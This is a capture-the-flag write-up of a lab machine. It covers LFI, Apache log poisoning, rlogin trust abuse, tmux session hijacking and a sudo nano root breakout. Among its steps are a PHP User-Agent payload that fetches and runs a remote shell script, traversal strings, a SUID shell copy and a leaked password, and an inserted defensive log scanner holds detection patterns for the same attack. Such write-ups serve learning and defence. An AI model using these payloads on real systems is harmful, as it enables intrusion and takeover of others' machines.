██████╗░███████╗░██████╗███████╗████████╗  
██╔══██╗██╔════╝██╔════╝██╔════╝╚══██╔══╝
██████╔╝█████╗░░╚█████╗░█████╗░░░░░██║░░░
██╔══██╗██╔══╝░░░╚═══██╗██╔══╝░░░░░██║░░░
██║░░██║███████╗██████╔╝███████╗░░░██║░░░
╚═╝░░╚═╝╚══════╝╚═════╝░╚══════╝░░░╚═╝░░░

Box Summary

The box had an LFI in a web dashboard that allowed log poisoning, leading to a shell as www-data. From there, I found sadm was a trusted user via rlogin, so I created a local user with the same name and logged in without a password. Inside, I attached to an open tmux session and grabbed sadm's password. Finally, using a sudo nano privilege, I escalated to root with a quick breakout.


INFO

I started with a basic scan and found this:

22/tcp   open  ssh
80/tcp   open  http
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell

FOOTHOLD

Port 80 was running a web server with a simple Reset button. I tried submitting admin and it worked. Captured the request with Caido and saw the password exposed in plain text.


LFI

After logging into the Dashboard, I saw this:

Checking how the data was being loaded, I found this:

file=%2Fvar%2Flog%2Fapache2%2Faccess.log

So I threw in a standard Linux LFI wordlist and got some hits:


Poisoning Logs

From what I saw, the dashboard was reading log files like syslog and auth.log, so I decided to try log poisoning.

Used this:

curl -A "<?php system('curl 10.10.14.61/rev.sh|bash'); ?>" http://10.129.184.161/

Then accessed the log via LFI like this:

file=../../../../../../../var/log/apache2/access.log

And got a shell!
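From the defender's side, this is what the attack above leaves in the web logs. The following scanner is an added example, not code from the writeup: it parses Apache combined-format access-log lines (constructed samples below; the dashboard.php path is an assumption) and flags PHP tags in client-supplied headers together with a file= parameter that reads a log or uses traversal.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)   # <?php ... or <?= ...
LOG_PATHS = ('/var/log/', 'access.log', 'auth.log', 'syslog')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def check_entry(entry):
    """Return the findings for one parsed log entry (empty list if clean)."""
    findings = []
    # 1. PHP code in a header Apache writes verbatim into the log (poisoning attempt)
    if PHP_TAG_RE.search(entry['ua']) or PHP_TAG_RE.search(entry['referer']):
        findings.append('php-tag-in-header')
    # 2. file= parameter pointing at a log file or containing traversal (LFI read-back)
    parts = entry['request'].split(' ')
    if len(parts) >= 2:
        for value in parse_qs(urlsplit(parts[1]).query).get('file', []):
            decoded = unquote(value)  # parse_qs decoded once; catch double encoding too
            if '../' in decoded or any(p in decoded for p in LOG_PATHS):
                findings.append('lfi-log-read')
                break
    return findings

def scan(lines):
    """Return (client, request, findings) for every line that triggers a finding."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry and check_entry(entry):
            results.append((entry['host'], entry['request'], check_entry(entry)))
    return results

# Constructed sample log lines (not taken from the box)
SAMPLE_LOG = [
    '10.10.14.5 - - [16/Jul/2025:03:29:55 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.10.14.61 - - [16/Jul/2025:03:30:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php phpinfo(); ?>"',
    '10.10.14.61 - - [16/Jul/2025:03:30:05 +0000] "GET /dashboard.php?file=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 2048 "http://10.129.184.161/dashboard.php" "Mozilla/5.0"',
    '10.10.14.61 - - [16/Jul/2025:03:30:09 +0000] "GET /dashboard.php?file=../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for host, request, findings in scan(SAMPLE_LOG):
        print(host, findings, request)
```

Alerting on the first finding alone is enough to catch the poisoning before the LFI read-back completes it.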


We can cat the user.txt file as www-data, located at /home/sadm/user.txt.

While exploring, I noticed that sadm was listed as a trusted user. We can see that rlogin is set up through the /etc/hosts.equiv file, and that file is present on the box.

Another interesting thing is that we can see the user sadm has an active tmux session.


SADM USER | RLOGIN

To use rlogin, I saw that sadm was listed as a trusted user in /etc/hosts.equiv. So locally I created a user with the same name:

sudo useradd sadm
sudo passwd sadm

su sadm
rlogin 10.129.184.161

Logged in without a password!


TMUX Session

I had already noticed that there was a tmux session running as sadm. For those who don’t know, tmux lets you have multiple terminal windows in one session and stay connected even if you close the shell:

tmux ls
sadm_session: 1 windows (created Wed Jul 16 03:25:31 2025)

tmux a -t sadm_session

And... we got sadm's password!

Password: 7lE2PAfVHfjz4HpE


PrivEsc to ROOT

Logged in as sadm using the found password. Checked for sudo rights:

sadm@reset:~$ sudo -l
Matching Defaults entries for sadm on reset:
env_reset, timestamp_timeout=-1, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User sadm may run the following commands on reset:
(ALL) PASSWD: /usr/bin/nano /etc/firewall.sh
(ALL) PASSWD: /usr/bin/tail /var/log/syslog
(ALL) PASSWD: /usr/bin/tail /var/log/auth.log

The fact that I could run nano via sudo was perfect, a classic breakout opportunity :D

sudo /usr/bin/nano /etc/firewall.sh

# Inside nano:
Ctrl + R
Ctrl + X

reset; sh 1>&0 2>&0

Alternative method I tried:

cp /bin/bash /tmp/shaka && chmod +xs /tmp/shaka
cd /tmp/
./shaka -p

And got root access: